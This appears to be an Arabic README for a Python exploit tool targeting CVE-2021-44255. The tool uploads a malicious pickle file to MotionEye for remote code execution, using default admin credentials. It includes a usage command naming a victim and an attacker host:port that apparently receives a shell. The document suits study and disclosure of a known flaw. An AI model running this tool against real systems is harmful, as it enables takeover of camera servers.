
نص برمجي بلغة Python 3 يرفع ملف tasks.pickle الذي يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) في MotionEye. CVE-2021-44255
سكربت بلغة Python 3 يقوم برفع ملف tasks.pickle يتيح تنفيذ الأوامر (RCE) في MotionEye. تحتاج إلى بيانات اعتماد المسؤول، لذا لا ينبغي أن يكون الأمر مشكلة كبيرة. لسوء الحظ، يمكن العثور على MotionEye/MotionEyeOS تعمل غالبًا ببيانات الاعتماد الافتراضية.
مثال:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
حيث يكون victim و attacker بصيغة ip:port، إلا إذا كان المنفذ 80، فبإمكانك حينها حذف المنفذ. يستخدم هذا النص اسم المستخدم الافتراضي admin مع كلمة مرور فارغة. تتوفر أيضًا خيارات في سطر الأوامر لأسماء مستخدمين/كلمات مرور بديلة. يرجى مراجعة الكود لمزيد من التفاصيل.
CVE-2021-44255
انظر https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye للحصول على تقرير حول هذه الثغرة وغيرها من المشكلات.